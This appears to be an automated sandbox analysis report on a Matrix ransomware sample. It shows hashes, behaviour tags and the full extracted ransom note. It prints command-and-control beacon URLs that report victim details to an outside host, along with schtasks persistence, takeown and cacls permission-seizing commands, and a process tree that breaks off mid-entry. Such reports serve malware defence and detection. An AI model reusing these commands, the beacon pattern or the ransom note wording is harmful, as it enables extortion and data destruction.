matrix | 44ee695b532eb984e46de29569ce35854b37d409efaabb6bcf9f5316e2b0546d

Resubmissions

18-04-2024 18:50

240418-xha8wabh29 10

01-01-2024 15:12

240101-slnwxsfeh4 10

Analysis

max time kernel
17s
max time network
180s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
01-01-2024 15:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
Size

3.7MB
MD5

9c7e90d7637277bb4f4985405eb0ace9
SHA1

5b0899d790eb4a37260e5d9b8a2ad3f2ada55b1d
SHA256

335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf
SHA512

7b57021edfa1108558c2d02df0600de55fd9338dfebc044c03dc677072975acc216a0374cff270d9d75f20e5b92b252f75b2ad3b94f603e7a09f69c14ca888d9
SSDEEP

98304:Pvqlou/EtfzJS+1S6+T9aLcNvvj5Pudln7QktFJLRyC2hVW13:w/Q7I+T8aLcNvvjQn7QkjFkDVW

Score

10^/10

matrix discovery ransomware upx

Malware Config

Extracted

Path

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#NOBAD_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par empty\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 443401BB5C40F14B\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b empty\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 443401BB5C40F14B\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 gLwiiyNW\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 3 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

description	flow	ioc
HTTP URL	43	http://nobad.mygoodsday.org/addrecord.php?apikey=nobad_api_key&compuser=FMAEQIOU\|Admin&sid=OauZk3wRb4xOlEVt&phase=START
HTTP URL	179	http://nobad.mygoodsday.org/addrecord.php?apikey=nobad_api_key&compuser=FMAEQIOU\|Admin&sid=OauZk3wRb4xOlEVt&phase=[ALL]443401BB5C40F14B
HTTP URL	182	http://nobad.mygoodsday.org/addrecord.php?apikey=nobad_api_key&compuser=FMAEQIOU\|Admin&sid=OauZk3wRb4xOlEVt&phase=443401BB5C40F14B\|5544\|3GB

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Executes dropped EXE 1 IoCs

Processes:

NWnLzQkw.exe

pid process

2100 NWnLzQkw.exe

pid	process
2100	NWnLzQkw.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
7264	takeown.exe
2376	takeown.exe
3940	takeown.exe
5904	takeown.exe
5548	takeown.exe
7728	takeown.exe
3820	takeown.exe
4076	takeown.exe
4664	takeown.exe
8172	takeown.exe
2768	takeown.exe
2916	takeown.exe
8064	takeown.exe
944	takeown.exe
7020	takeown.exe
1840	takeown.exe
7504	takeown.exe
7156	takeown.exe
5260	takeown.exe
1424	takeown.exe
6868	takeown.exe
3884	takeown.exe
6588	takeown.exe
7136	takeown.exe
7672	takeown.exe
2768	takeown.exe
3976	takeown.exe
5888	takeown.exe
6392	takeown.exe
6916	takeown.exe
2672	takeown.exe
7512	takeown.exe
5364	takeown.exe
6176	takeown.exe
7920	takeown.exe
6100	takeown.exe
6960	takeown.exe
8180	takeown.exe
7064	takeown.exe
5592	takeown.exe
7972	takeown.exe
6880	takeown.exe
868	takeown.exe
2480	takeown.exe
7832	takeown.exe
4656	takeown.exe
7072	takeown.exe
7588	takeown.exe
384	takeown.exe
1480	takeown.exe
7928	takeown.exe
4360	takeown.exe
6572	takeown.exe
7988	takeown.exe
6568	takeown.exe
6028	takeown.exe
7072	takeown.exe
7128	takeown.exe
2612	takeown.exe
7484	takeown.exe
5352	takeown.exe
7624	takeown.exe
3908	takeown.exe
7336	takeown.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
behavioral12/memory/6696-4834-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
behavioral12/memory/1152-5811-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
behavioral12/memory/1152-6079-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7104-6086-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6416-6084-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
behavioral12/memory/7504-6078-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
behavioral12/memory/7892-6155-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7728-6146-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6696-6163-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
behavioral12/memory/6508-6251-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5520-6254-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
behavioral12/memory/5356-6855-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7760-6849-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
behavioral12/memory/5552-6863-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7976-6861-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
behavioral12/memory/6516-6901-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6524-6903-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
behavioral12/memory/8060-6909-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
behavioral12/memory/4712-6911-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5564-6913-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/3948-6915-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/2572-6917-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/1368-6921-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/2660-6923-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/3856-6927-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6960-6931-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5676-6933-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6980-6935-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
behavioral12/memory/6056-6939-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5424-6945-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7496-6947-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6280-6949-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6416-6951-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7736-6953-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7228-6957-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6664-6959-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5580-6961-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/1992-6969-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4584-6971-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
behavioral12/memory/5396-6975-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe	upx
behavioral12/memory/5936-6983-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7404-6985-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6536-6987-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Enumerates connected drives 3 TTPs 21 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe

description	ioc	process
File opened (read-only)	\??\X:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\V:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\S:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\L:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\K:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\H:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\E:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\Y:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\M:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\U:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\R:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\P:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\O:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\I:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\W:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\T:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\Q:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\N:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\J:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\G:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File opened (read-only)	\??\Z:	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

6000 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

4020 vssadmin.exe

pid	process
6000	schtasks.exe

pid	process
4020	vssadmin.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe

description	pid	process	target process
PID 2464 wrote to memory of 4692	2464	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2464 wrote to memory of 4692	2464	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2464 wrote to memory of 4692	2464	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	cmd.exe
PID 2464 wrote to memory of 2100	2464	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	NWnLzQkw.exe
PID 2464 wrote to memory of 2100	2464	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	NWnLzQkw.exe
PID 2464 wrote to memory of 2100	2464	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe	NWnLzQkw.exe

C:\Users\Admin\AppData\Local\Temp\335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
"C:\Users\Admin\AppData\Local\Temp\335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe"
1⤵
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:2464
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe" "C:\Users\Admin\AppData\Local\Temp\NWnLzQkw.exe"
  2⤵
  PID:4692
- C:\Users\Admin\AppData\Local\Temp\NWnLzQkw.exe
  "C:\Users\Admin\AppData\Local\Temp\NWnLzQkw.exe" -n
  2⤵
  - Executes dropped EXE
  PID:2100
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\fJVtlTB4.vbs"
  2⤵
  PID:4680
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\fJVtlTB4.vbs"
    3⤵
    PID:2796
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wuAv3cia.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      PID:7200
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wuAv3cia.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:6000
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:6656
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:1556
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IfiP0jkq.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  PID:4144
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:4912
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1584
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""
  2⤵
  PID:3988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db" /E /G Admin:F /C
    3⤵
    PID:7612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"
    3⤵
    - Modifies file permissions
    PID:8064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "ActivitiesCache.db" -nobanner
    3⤵
    PID:7904
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "ActivitiesCache.db" -nobanner
      4⤵
      PID:6696
    - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX64.exe
        
        qL02HjdX.exe -accepteula "ActivitiesCache.db" -nobanner
        5⤵
        
        PID:5228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
  2⤵
  PID:5504
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:7008
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    - Modifies file permissions
    PID:7920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "store.db" -nobanner
    3⤵
    PID:6864
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6416
- C:\Windows\SysWOW64\cmd.exe
